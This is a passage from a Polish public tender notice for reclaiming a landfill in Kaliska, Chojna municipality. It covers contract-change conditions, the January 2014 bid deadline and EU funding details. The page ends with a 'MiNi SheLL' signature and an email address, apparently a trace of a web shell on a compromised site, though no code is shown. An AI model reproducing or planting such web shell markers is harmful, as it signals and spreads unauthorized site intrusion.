a)	braku lub wady dokumentacji projektowej lub wystąpienia konieczności  wykonania dokumentacji zamiennej, gdy czas na usunięcie braków i wad lub wykonanie dokumentacji zamiennej, spowoduje wydłużenie terminu realizacji przedmiotu zamówienia,
b)	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami wiedzy technicznej i obowiązujących przepisów,
c)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się przewidzieć               np. huragan powódź,
d)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja ma wpływ na termin wykonania umowy,
e)	wystąpienia nieprzewidzianych warunków realizacji. np. warunki gruntowo-wodne będą inne niż w dokumentacji projektowej, nastąpi odkrycie nie zainwentaryzowanych obiektów czy elementów instalacji podziemnej.
f)	przedłużenia procedury uzyskiwania opinii, uzgodnień, pozwoleń z przyczyn niezależnych od Wykonawcy tj. powodu nie zachowania terminów przez organy czy instytucje,
g)	zmiany stanu prawnego w tym zmiany stawki podatku VAT,
h)	ograniczenia zakresu prac np. w przypadku zmiany sposobu przeprowadzenia prac lub użycia innych materiałów,
i)	innej okoliczności prawnej, ekonomicznej lub technicznej skutkującej niemożliwością wykonania lub nienależytym wykonaniem umowy zgodnie z SIWZ.           

4.  Określa się następujący tryb dokonywania zmian postanowień umowy:

1)	zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności,
2)	strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia powyższych okoliczności,
3)	wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pukchojna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Usług Komunalnych w Chojnie Sp.z o.o.
ul. Słowiańska 1
74-500 Chojna
pok 109 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 11:00, miejsce: Przedsiębiorstwo Usług Komunalnych w Chojnie Sp.z o.o.
ul. Słowiańska 1
74-500 Chojna
sekretariat pok 100 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w ramach operacji dofinansowanej z Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013 Oś priorytetowa 4 Infrastruktura ochrony Środowiska Działanie 4.2 Gospodarka odpadami  pod nazwą: Rekultywacja wysypiska odpadów  innych niż niebezpieczne w miejscowości Kaliska, Gmina Chojna - Umowa - Projekt Nr UDA - RPZP.04.02.00-32-022/11-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com